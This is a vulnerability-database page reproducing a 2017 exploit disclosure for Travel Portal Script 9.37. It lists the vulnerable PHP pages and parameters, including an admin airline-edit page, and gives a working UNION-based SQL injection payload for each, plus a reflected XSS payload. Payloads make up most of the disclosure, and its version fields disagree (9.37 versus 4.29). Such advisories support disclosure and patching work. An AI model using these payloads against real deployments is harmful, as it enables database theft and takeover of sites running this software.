Vulners
Lucene search
Travel Portal Script 9.37 Cross Site Scripting / SQL Injection Vulnerabilities
Exploit Title : Travel Portal Script v9.37 - Multiple Vulnerability
Google Dork : -
Date : 23/02/2017
Exploit Author : Marc Castejon <[email protected]>
Vendor Homepage : http://itechscripts.com/travel-portal-script/
Software Link: http://travel.itechscripts.com/
Type : webapps
Platform: PHP
Version: 4.29
Sofware Price and Demo : $250
------------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/holiday.php
Vulnerable Parameters: hid
Method: GET
Payload:-1 UNION ALL SELECT
NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL--
lRVf
------------------------------------------------
Type: Reflected XSS
Vulnerable URL:http://localhost/[PATH]/holiday.php
Vulnerable Parameters: hid
Method: GET
Payload: "/><img src=i onerror=prompt(1)>
------------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/pages.php
Vulnerable Parameters: id
Method: GET
Payload:-1 UNION ALL SELECT
NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL--
lRVf
-------------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/content.php
Vulnerable Parameters: id
Method: GET
Payload:-1 UNION ALL SELECT
NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL--
lRVf
-------------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/hotel.php
Vulnerable Parameters: id
Method: GET
Payload:-1 UNION ALL SELECT
NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL--
lRVf
-------------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/holiday_book.php
Vulnerable Parameters: hid
Method: GET
Payload:-1 UNION ALL SELECT
NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL--
lRVf
------------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/admin/airline-edit.php
Vulnerable Parameters: fid
Method: GET
Payload:-1 UNION ALL SELECT
NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL--
lRVf
------------------------------------------------
# 0day.today [2018-01-05] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Feb 2017 00:00Current
7.9High risk
Vulners AI Score7.9